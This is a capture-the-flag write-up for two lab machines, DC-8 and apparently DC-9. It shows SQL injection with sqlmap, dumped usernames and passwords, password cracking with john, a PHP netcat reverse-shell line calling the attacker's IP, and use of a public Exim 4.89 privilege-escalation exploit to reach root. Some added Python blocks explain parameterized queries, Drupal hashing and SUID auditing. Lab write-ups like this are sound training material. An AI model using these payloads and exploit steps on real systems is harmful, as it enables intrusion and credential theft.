
1. Discovery

nmap

```
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:f3:3b:7c, IPv4: 192.168.43.157
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1 3a:e9:6f:eb:62:78 (Unknown: locally administered)
192.168.43.88 08:00:27:a3:ed:7c PCS Systemtechnik GmbH
192.168.43.153 ca:6e:5b:3c:62:0f (Unknown: locally administered)

┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.43.88
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-12 15:39 CST
Nmap scan report for dc-8 (192.168.43.88)
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:A3:ED:7C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
```

IP: 192.168.43.88

dirsearch

```
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.43.88/ -e php,txt,html,htm -i 200

[20:57:02] Starting:
[20:57:59] 200 - 33KB - /CHANGELOG.txt
[20:58:02] 200 - 769B - /COPYRIGHT.txt
[20:58:24] 200 - 1KB - /install.php
[20:58:24] 200 - 868B - /INSTALL.mysql.txt
[20:58:24] 200 - 842B - /INSTALL.pgsql.txt
[20:58:24] 200 - 1KB - /install.php?profile=default
[20:58:24] 200 - 6KB - /INSTALL.txt
[20:58:27] 200 - 7KB - /LICENSE.txt
[20:58:30] 200 - 2KB - /MAINTAINERS.txt
[20:58:35] 200 - 2KB - /node
[20:58:44] 200 - 2KB - /README.txt
[20:58:45] 200 - 744B - /robots.txt
[20:58:48] 200 - 715B - /sites/all/modules/README.txt
[20:58:48] 200 - 545B - /sites/all/themes/README.txt
[20:58:48] 200 - 129B - /sites/all/libraries/README.txt
[20:58:48] 200 - 0B - /sites/example.sites.php
[20:58:48] 200 - 431B - /sites/README.txt
[20:58:55] 200 - 3KB - /UPGRADE.txt
[20:58:56] 200 - 2KB - /user
[20:58:56] 200 - 2KB - /user/
[20:58:56] 200 - 2KB - /user/login/
[20:58:58] 200 - 177B - /views/ajax/autocomplete/user/a
[20:59:00] 200 - 2KB - /web.config
[20:59:03] 200 - 42B - /xmlrpc.php
```

Notes

  • -i / --include-status: the status codes to keep, comma-separated (e.g. -i 200,201
  • -u: target URL
  • -e / --extensions: the file extensions to scan
    Here: php, txt, html and htm pages with status 200 and 403

Check robots.txt

It reveals the login path.

2. The page

Clicking "Who we Are" shows nid=2 in the URL, so we suspect an injection point.

Appending ' to the value confirms the injection point.
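
Why a stray quote changes the page: the nid value is spliced into the SQL text, so the database parses it as part of the query rather than as data. The block below is an added illustration, not code from the page or from Drupal: it uses an in-memory SQLite table with constructed rows standing in for the site's node table, and runs the same probes a tester sends (a true condition, a false condition, a bare quote) against a concatenating lookup and a parameterized one.

```python
import sqlite3

# Constructed rows standing in for the site's node table (not the real d7db schema).
SAMPLE_NODES = [(1, "Home"), (2, "Who we are"), (3, "Contact")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE node (nid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO node VALUES (?, ?)", SAMPLE_NODES)
    return conn


def lookup_vulnerable(conn, nid):
    """Builds the statement by string concatenation: whatever the client sends
    becomes SQL syntax, so 'AND 1=2' filters rows and a quote breaks the parser."""
    sql = "SELECT title FROM node WHERE nid = " + nid
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, nid):
    """Binds the value as a parameter: it is compared as data and can never
    change the shape of the query, whatever characters it contains."""
    return [row[0] for row in conn.execute("SELECT title FROM node WHERE nid = ?", (nid,))]


def probe(lookup):
    """Run the tester's probes through `lookup` and record what each one yields:
    a list of titles, or the string 'error' when the database rejects the query."""
    conn = make_db()
    results = {}
    for value in ("2", "2 AND 1=1", "2 AND 1=2", "2'"):
        try:
            results[value] = lookup(conn, value)
        except sqlite3.Error:
            results[value] = "error"
    return results


if __name__ == "__main__":
    print("vulnerable:   ", probe(lookup_vulnerable))
    print("parameterized:", probe(lookup_parameterized))
```

With the concatenating lookup, "2 AND 1=1" and "2 AND 1=2" return different rows (the boolean-blind signal sqlmap reports below) and the bare quote raises an error (the HTTP 500s in its warning). With the parameterized lookup every probe except the plain "2" simply matches nothing.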

sqlmap

```
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.43.88/?nid=2 --batch
___
__H__
___ ___[,]_____ ___ ___ {1.9.11#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:00:01 /2026-01-12/
......
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=2 AND 6281=6281

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: nid=2 AND (SELECT 2777 FROM(SELECT COUNT(*),CONCAT(0x71717a6b71,(SELECT (ELT(2777=2777,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=2 AND (SELECT 1947 FROM (SELECT(SLEEP(5)))UZxb)

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: nid=-6921 UNION ALL SELECT CONCAT(0x71717a6b71,0x645a5a425551534354454450646c59696655557456596e534e6d6579745764465442416764717553,0x7171787871)-- -
---
[16:00:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[16:00:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 25 times
[16:00:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.43.88'
```

List the databases

```
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.43.88/?nid=2 --batch --dbs
available databases [2]:
[*] d7db
[*] information_schema
```

Two databases are found: d7db and information_schema (the system database, which can be ignored).

List the tables in the d7db database

```
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.43.88/?nid=2 --batch -D d7db --tables
Database: d7db
[88 tables]
+-----------------------------+
| block |
.......
| users |
| users_roles |
| |
+-----------------------------+
```

List the columns of the users table

```
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.43.88/?nid=2 --batch -D d7db -T users --columns
Database: d7db
Table: users
[16 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| data | longblob |
| language | varchar(12) |
| name | varchar(60) |
| status | tinyint(4) |
| access | int(11) |
| created | int(11) |
| init | varchar(254) |
| login | int(11) |
| mail | varchar(254) |
| pass | varchar(128) |
| picture | int(11) |
| signature | varchar(255) |
| signature_format | varchar(255) |
| theme | varchar(255) |
| timezone | varchar(32) |
| uid | int(10) unsigned |
+------------------+------------------+
```

Dump the name and pass columns of the users table

```
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.43.88/?nid=2 --batch -D d7db -T users -C "name,pass" --dump
+--------+---------------------------------------------------------+
| name | pass |
+--------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+--------+---------------------------------------------------------+
[16:17:09] [INFO] table 'd7db.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.43.88/dump/d7db/users.csv'
[16:17:09] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[16:17:09] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.43.88'
```

John

The first hash (admin) did not crack; the second user, john, did.

```
┌──(root㉿kali)-[~/localkali/testpayload/CD8]
└─# john --format=drupal7 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
turtle (?)
1g 0:00:00:00 DONE (2026-01-12 16:34) 1.785g/s 914.2p/s 914.2c/s 914.2C/s genesis..letmein
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

user: John
pass: turtle
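
Why admin's hash held while john's fell is a matter of the password, not the scheme: both are Drupal 7 $S$ hashes, and the D right after $S$ encodes 2^15 = 32768 SHA-512 rounds, which is the "Cost 1 (iteration count) is 32768" john reports. The block below is an added re-implementation of that scheme in Python (my rendering of the logic in Drupal 7's password.inc, not the page's or Drupal's own code) showing what each character position means and how a stored hash is verified; john's hash is the one from the sqlmap dump above.

```python
import hashlib
import os

# Drupal 7's custom base64 alphabet (the same one phpass uses).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55  # stored hashes are truncated to 55 characters

# john's hash as dumped from d7db.users above; admin's has the same layout.
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"


def b64_encode(data):
    """Encode bytes the way Drupal's _password_base64_encode() does:
    no padding, little-endian bit packing, ITOA64 alphabet."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def iteration_count(hashed):
    """The 4th character stores log2 of the round count: 'D' is index 15, so 2**15 = 32768."""
    if not hashed.startswith("$S$"):
        raise ValueError("not a Drupal 7 $S$ hash")
    return 1 << ITOA64.index(hashed[3])


def drupal7_crypt(password, setting):
    """Recompute a $S$ hash from its 12-character setting: '$S$' + cost char + 8-char salt.
    The salt is hashed with the password once, then the digest is re-hashed with the
    password `count` more times; that is what makes every guess cost 32769 SHA-512 calls."""
    setting = setting[:12]
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(iteration_count(setting)):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + b64_encode(digest))[:HASH_LENGTH]


def verify(password, stored):
    """True when `password` reproduces the stored hash (the stored hash carries its own setting)."""
    return drupal7_crypt(password, stored) == stored


def new_hash(password, count_log2=15):
    """Create a fresh hash with a random salt, as Drupal 7 does on a password change."""
    salt = b64_encode(os.urandom(6))  # 6 random bytes encode to exactly 8 characters
    return drupal7_crypt(password, "$S$" + ITOA64[count_log2] + salt)


if __name__ == "__main__":
    print("rounds:", iteration_count(JOHN_HASH))
    print("turtle verifies against john's hash:", verify("turtle", JOHN_HASH))
```

The cost is the only tunable: at 32768 rounds john manages roughly 900 candidates per second per the output above, so a wordlist password like turtle falls at once while anything outside the list is effectively out of reach on this hardware. Raising the cost character (Drupal allows up to 'V', 2^30) slows both sides equally.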

3. Login

Hunting for useful leads bit by bit, we find a webform that can be edited.

It allows selecting PHP as the language, so we consider an nc reverse shell.

```php
<?php
system("nc -e /bin/bash 192.168.3.37 1111")
?>
```

4. Privilege escalation

Normally you would check the kernel version with uname -a or the scheduled tasks with cat /etc/crontab; neither yields anything on this box.

Analysis

```
┌──(root㉿kali)-[~]
└─# nc -lp 1111
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c "import pty;pty.spawn('/bin/bash');"
www-data@dc-8:/var/www/html$ find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
```

python3 -c "import pty;pty.spawn('/bin/bash');" ==stabilizes the shell==

find / -user root -perm -4000 -print 2>/dev/null
What this command does: starting at the root directory it walks the whole filesystem looking for files that are owned by root and whose permission bits include SUID (4000), prints every matching path, and discards all error messages.

-user root:
Condition 1: the file's owner must be root (only root-owned files match; files owned by anyone else are excluded).

-perm -4000:
Condition 2: the file's permissions must at least include the SUID special bit (mode 4000); this is the key part of the command:

  1. perm: matches on the file's permission mode (numeric or symbolic);
  2. the leading -: means "the file's permissions include this bit", not an exact match (e.g. mode 4755 includes 4000 and therefore matches);
  3. 4000: the SUID (Set UID) special permission (the owner's set-user-ID bit).
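
The same check expressed as a script, so it can run on a schedule and be diffed against a known-good list; that is how a defender turns this enumeration step into detection, since a root-owned SUID binary appearing on a host is a strong signal. This is an added example, not code from the page: the tree it scans is constructed in a temporary folder, and while the owner filter defaults to uid 0 (root) the demo uses the current user so it runs without privileges.

```python
import os
import stat
import tempfile


def find_setuid(root, owner_uid=0):
    """Equivalent of `find root -user <owner> -perm -4000 -print 2>/dev/null`:
    regular files under `root` owned by `owner_uid` whose mode has the set-user-ID bit.
    Directories that cannot be read are skipped silently, like the 2>/dev/null above."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: the bit must be on the file itself, not a link target
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_uid == owner_uid and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def diff_against_baseline(current, baseline):
    """Which SUID binaries appeared since the baseline was taken, and which vanished.
    A new entry (a dropped helper, a chmod u+s on a copied shell) is the alert condition."""
    cur, base = set(current), set(baseline)
    return {"added": sorted(cur - base), "removed": sorted(base - cur)}


def demo():
    """Constructed tree: two files, one marked setuid. The owner filter is the current
    user so the demo needs no privileges; on a real host you would pass owner_uid=0."""
    with tempfile.TemporaryDirectory() as root:
        bin_dir = os.path.join(root, "usr", "bin")
        os.makedirs(bin_dir)
        plain, suid = os.path.join(bin_dir, "plain"), os.path.join(bin_dir, "suid-tool")
        for path in (plain, suid):
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
        os.chmod(plain, 0o755)
        os.chmod(suid, 0o4755)
        found = find_setuid(root, owner_uid=os.getuid())
        # A baseline that knew about suid-tool and about a binary that has since been removed.
        baseline = [suid, os.path.join(bin_dir, "gone")]
        delta = diff_against_baseline(found, baseline)

        def rel(path):
            return os.path.relpath(path, root)

        return [rel(p) for p in found], {k: [rel(p) for p in v] for k, v in delta.items()}


if __name__ == "__main__":
    print(demo())
```

On a live host, find_setuid("/") gives the same list the find command prints above; store it once, then alert on the "added" side of diff_against_baseline at each later run.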

Check the exim4 version

```
www-data@dc-8:/var/www/html$ /usr/sbin/exim4 --version
/usr/sbin/exim4 --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
www-data@dc-8:/var/www/html$
```

/usr/sbin/exim4 --version
shows the version: Exim version 4.89

[!NOTE] exim4
On Debian-family distributions (Debian/Ubuntu/Kali), /usr/sbin/exim4 is the executable of the Exim mail transfer agent (MTA). Its job is sending, receiving and routing system mail, and on CTF boxes it is a common privilege-escalation foothold. exim4 is the Debian packaging of Exim (Extended Internet Mailer): functionally the same as upstream Exim, differing only slightly in configuration-file layout and package management (the complex configuration is simplified to suit Debian-based systems).

kali searchsploit

We found the SUID binary exim4 earlier, but searching for exim4 returns only one entry with no version information, so search for exim instead: searchsploit exim

```
┌──(root㉿kali)-[/var/www/html]
└─# searchsploit exim
Exim 4.87 - 4.91 - Local Privilege Escalation | linux/local/46996.sh
......
```

File path: /usr/share/exploitdb/exploits/linux/local/46996.sh

Sending a.sh

Copy it to the current directory and rename it to a.sh so it is easy to serve and fetch over HTTP.

```
┌──(root㉿kali)-[~/localkali/testpayload/DC8]
└─# cp /usr/share/exploitdb/exploits/linux/local/46996.sh . # copy to the current directory

┌──(root㉿kali)-[~/localkali/testpayload/DC8]
└─# ls -l
总计 8
-rwxr-xr-x 1 root root 3552 1月12日 20:34 46996.sh
-rw-r--r-- 1 root root 56 1月12日 16:33 hash.txt

┌──(root㉿kali)-[~/localkali/testpayload/DC8]
└─# mv 46996.sh a.sh
┌──(root㉿kali)-[~/localkali/testpayload/DC8]
└─# ls -l
总计 8
-rwxr-xr-x 1 root root 3552 1月12日 20:34 a.sh
-rw-r--r-- 1 root root 56 1月12日 16:33 hash.txt

┌──(root㉿kali)-[~/localkali/testpayload/DC8]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.3.47 - - [12/Jan/2026 20:40:45] "GET /a.sh HTTP/1.1" 200 -
```

Receiving a.sh

  • wget a.sh
  • grant execute permission: chmod +x a.sh
  • run ./a.sh -m netcat
  • wait 5 seconds, then run id
```
www-data@dc-8:/tmp$ wget http://192.168.3.48:8000/a.sh
wget http://192.168.3.48:8000/a.sh
--2026-01-12 22:40:45-- http://192.168.3.48:8000/a.sh
Connecting to 192.168.3.48:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [application/x-sh]
Saving to: 'a.sh'

a.sh 100%[===================>] 3.47K --.-KB/s in 0s

2026-01-12 22:40:45 (367 MB/s) - 'a.sh' saved [3552/3552]

www-data@dc-8:/tmp$ ls -l
ls -l
total 4
-rw-r--r-- 1 www-data www-data 3552 Jan 12 22:34 a.sh

www-data@dc-8:/tmp$ chmod +x a.sh
chmod +x a.sh
www-data@dc-8:/tmp$ ./a.sh -m netcat
./a.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Mon, 12 Jan 2026 22:48:06 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1vfHL4-0000G7-8o
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
cd /root
ls
flag.txt
cat flag.txt

Brilliant - you have succeeded!!!

888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888



Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.
```

[!NOTE] Tip
The root shell here lasts about a minute before dropping back to the unprivileged user, but a minute is enough to do a lot, such as adding an account or stopping services.

1. Discovery

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.3.1 18:d9:8f:c8:68:38 Huawei Device Co., Ltd.
192.168.3.4 00:e0:4c:4d:2a:68 REALTEK SEMICONDUCTOR CORP.
192.168.3.5 b4:2e:99:cc:28:45 GIGA-BYTE TECHNOLOGY CO.,LTD.
192.168.3.45 08:00:27:95:4e:a9 PCS Systemtechnik GmbH
```

nmap

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─# nmap -p- 192.168.3.45
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 17:51 CST
Nmap scan report for 192.168.3.45
Host is up (0.00072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
MAC Address: 08:00:27:95:4E:A9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
```

  • Note that port 22 is filtered

dirsearch

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─# dirsearch -u http://192.168.3.45/index.php
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/localkali/testpayload/reports/http_192.168.3.45/_index.php_26-01-10_17-58-52.txt

Target: http://192.168.3.45/

[17:58:52] Starting: index.php/
[17:58:53] 404 - 274B - /index.php/%2e%2e//google.com

Task Completed
```

Nothing useful.


2. sqlmap

There is a search page that accepts input, so we suspect an injection point.

Note that it is a POST request: the page URL does not change, and Burp also shows the POST. There are two ways to test it with sqlmap.


Method 1

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─# sqlmap -u http://192.168.3.45/results.php --data "search=1" --level=5 --batch
```

  • First, note that the URL is results.php, the POST target visible in Burp.
  • Because it is a POST request, --data is required; --level=5 makes the checks stricter (optional).

The search parameter is found to be injectable

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─# sqlmap -u http://192.168.3.45/results.php --data "search=1" --batch
___
__H__
___ ___[,]_____ ___ ___ {1.9.11#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:09:40 /2026-01-10/

[18:09:40] [INFO] testing connection to the target URL
[18:09:40] [INFO] testing if the target URL content is stable
[18:09:40] [INFO] target URL content is stable
[18:09:40] [INFO] testing if POST parameter 'search' is dynamic
[18:09:40] [WARNING] POST parameter 'search' does not appear to be dynamic
[18:09:40] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[18:09:40] [INFO] testing for SQL injection on POST parameter 'search'
[18:09:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:09:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:09:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:09:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:09:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[18:09:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:09:41] [INFO] testing 'Generic inline queries'
[18:09:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:09:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:09:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:09:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:10:01] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:10:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:10:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:10:01] [INFO] target URL appears to be UNION injectable with 6 columns
[18:10:01] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 6494 FROM (SELECT(SLEEP(5)))FPWe) AND 'ggNh'='ggNh

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x44615268716e726b6e4966415575447a42676848597962535a79756e45646241566547736e654f66,0x7170786271),NULL,NULL-- -
---
[18:10:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:10:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.3.45'
```

Method 2

Copy the raw request captured in Burp into a.txt on Kali

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─# cat a.txt
POST /results.php HTTP/1.1
Host: 192.168.3.45
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://192.168.3.45
Connection: close
Referer: http://192.168.3.45/search.php
Cookie: PHPSESSID=um35hfg1i6v2rdrtie01kp5u2b
Upgrade-Insecure-Requests: 1
Priority: u=0, i

search=1
```

Then pass it to sqlmap with -l

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─ sqlmap -l a.txt --batch
# same result as above
```

Enumerate the databases

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─ sqlmap -l a.txt --batch --dbs
[18:15:12] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users
```

Two databases of interest: Staff and users; information_schema is built into MySQL and can be ignored.

List the tables in a database

Start with the users database: it has one table, UserDetails.

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─ sqlmap -l a.txt --batch -D users --tables
[18:17:09] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
```

List the columns of a table

First, the columns of the UserDetails table

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─ sqlmap -l a.txt --batch -D users -T UserDetails --columns
[18:21:24] [INFO] fetching columns for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column | Type |
+-----------+-----------------+
| firstname | varchar(30) |
| id | int(6) unsigned |
| lastname | varchar(30) |
| password | varchar(20) |
| reg_date | timestamp |
| username | varchar(30) |
+-----------+-----------------+
```

Dump the selected columns

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─ sqlmap -l a.txt --batch -D users -T UserDetails -C "username,password" --dump

[18:23:53] [INFO] fetching entries of column(s) 'password,username' for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+-----------+---------------+
| username | password |
+-----------+---------------+
| marym | 3kfs86sfd |
| julied | 468sfdfsd2 |
| fredf | 4sfd87sfd1 |
| barneyr | RocksOff |
| tomc | TC&TheBoyz |
| jerrym | B8m#48sd |
| wilmaf | Pebbles |
| bettyr | BamBam01 |
| chandlerb | UrAG0D! |
| joeyt | Passw0rd |
| rachelg | yN72#dsd |
| rossg | ILoveRachel |
| monicag | 3248dsds7s |
| phoebeb | smellycats |
| scoots | YR3BVxxxw87 |
| janitor | Ilovepeepee |
| janitor2 | Hawaii-Five-0 |
+-----------+---------------+

[18:23:53] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.3.45/dump/users/UserDetails.csv'
[18:23:53] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-01102026_0623pm.csv'
```

Save the data

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─ cat /root/.local/share/sqlmap/output/192.168.3.45/dump/users/UserDetails.csv | awk -F, '{print $1}' > user.txt

┌──(root㉿kali)-[~/localkali/testpayload]
└─cat /root/.local/share/sqlmap/output/192.168.3.45/dump/users/UserDetails.csv | awk -F, '{print $2}' > pass.txt

┌──(root㉿kali)-[~/localkali/testpayload]
└─# cat user.txt
username
marym
julied
